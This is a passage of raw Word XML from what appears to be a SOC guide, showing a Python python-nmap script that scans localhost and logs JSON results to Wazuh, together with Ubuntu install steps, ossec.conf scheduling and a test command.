            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">            if proto not in ["tcp", "udp"]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFFE58F" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33167F15" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">            for port in sorted(nm[host][proto].keys()):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01162432" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                json_output = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4977444A" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    'nmap_host': host,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F83B893" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="001E2C55" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="001E2C55">
              <w:t>'nmap_protocol': proto,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B4CE811" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="001E2C55" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2C55">
              <w:t xml:space="preserve">                    'nmap_port': port,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506FE05E" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2C55">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>'nmap_hostname': "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EFF4A4A" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    'nmap_hostname_type': "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D1F869" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="001E2C55" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="001E2C55">
              <w:t>'nmap_port_name': "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C33B3FA" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="00567DF6" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E2C55">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>'nmap_port_state': "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="468C63DF" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="001E2C55" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="001E2C55">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>'nmap_port_service': ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E04AFD" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2C55">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A991BE" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21490AF4" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                if nm[host]["hostnames"]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A35FFD2" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    json_output['nmap_hostname'] = nm[host]["hostnames"][0]["name"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A3D236" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    json_output['nmap_hostname_type'] = nm[host]["hostnames"][0]["type"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BC440ED" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22FB9FBD" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                if 'name' in nm[host][proto][port]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A2BCEC2" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    json_output['nmap_port_name'] = nm[host][proto][port]['name']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA7ABAF" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54725627" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                if 'state' in nm[host][proto][port]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4160007E" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    json_output['nmap_port_state'] = nm[host][proto][port]['state']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AFFB1F3" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E5A7863" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                if 'product' in nm[host][proto][port] and 'version' in nm[host][proto][port]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC9683F" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                    json_output['nmap_port_service'] = nm[host][proto][port]['product'] + " " + nm[host][proto][port]['version']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB12382" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32AC1E46" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">                results.append(json_output)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10123A93" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    return results</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265DD665" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78F6B4FC" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>def append_to_log(results, log_file):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8A0EA6" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    with open(log_file, "a") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A60CDBE" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">        for result in results:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC1F141" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">            f.write(json.dumps(result) + "\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11510E6D" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DA32DD5" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>subnets = ['127.0.0.1']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28223419" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43357654" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>if platform.system() == 'Windows':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750946C9" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    log_file = r"C:\Program Files (x86)\ossec-agent\active-response\active-responses.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FED77CA" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>elif platform.system() == 'Linux':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54197A71" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    log_file = "/var/ossec/logs/active-responses.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707B16D7" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:lastRenderedPageBreak/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D28357C" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    log_file = "/Library/Ossec/logs/active-responses.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A98A7CB" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D69F71A" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>for subnet in subnets:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453990EA" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    results = scan_subnet(subnet)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C792D22" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    append_to_log(results, log_file)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABD7B8A" w14:textId="5FC5602B" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    time.sleep(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="003ED95D" w14:textId="31A393E5" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFB62B3" w14:textId="77777777" w:rsidR="009A7B95" w:rsidRPr="007B3EE9" w:rsidRDefault="009A7B95" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06256D07" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ubuntu Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D44769" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Install dependenci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B3EE9" w:rsidRPr="001E2C55" w14:paraId="29B0D46F" w14:textId="77777777" w:rsidTr="007B3EE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2B6326A8" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>sudo apt update &amp;&amp; sudo apt install -y python3 python3-pip nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B3B198" w14:textId="5B20B35E" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>sudo pip3 install python-nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CE18D29" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="00567DF6" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6813BA24" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Place nmapscan.py in /home/malek/Documents/soc-scripts/:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="10490" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10490"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B3EE9" w:rsidRPr="001E2C55" w14:paraId="1C510D07" w14:textId="77777777" w:rsidTr="007B3EE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10490" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="519C053B" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>chmod 750 /home/malek/Documents/soc-scripts/nmapscan.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00AA321C" w14:textId="2FE0F46F" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>chown root:wazuh /home/malek/Documents/soc-scripts/nmapscan.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51AC3EB3" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E75C526" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Modify /var/ossec/etc/ossec.conf to run the script periodically:</w:t>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0461"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B3EE9" w:rsidRPr="001E2C55" w14:paraId="13A8E35D" w14:textId="77777777" w:rsidTr="007B3EE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10461" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4565F42E" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73555210" w14:textId="51F63C42" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;log_format&gt;full_command&lt;/log_format&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3A2959" w14:textId="68574464" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;command&gt;python3 /home/malek/Documents/soc-scripts/nmapscan.py&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715106C8" w14:textId="69B5C70F" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;frequency&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00567DF6">
              <w:t>900</w:t>
            </w:r>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;/frequency&gt; &lt;!-- --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B18DB7B" w14:textId="1117EACB" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>&lt;/localfile&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1267D918" w14:textId="0ED30F04" w:rsidR="006B7653" w:rsidRPr="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">       4.   </w:t>
      </w:r>
      <w:r w:rsidRPr="006B7653">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manual Tes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6B7653" w14:paraId="12956D3A" w14:textId="77777777" w:rsidTr="006B7653">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="43078566" w14:textId="69F6BB1E" w:rsidR="006B7653" w:rsidRPr="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="006B7653">
              <w:t>python3 /home/malek/Documents/soc-scripts/nmapscan.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
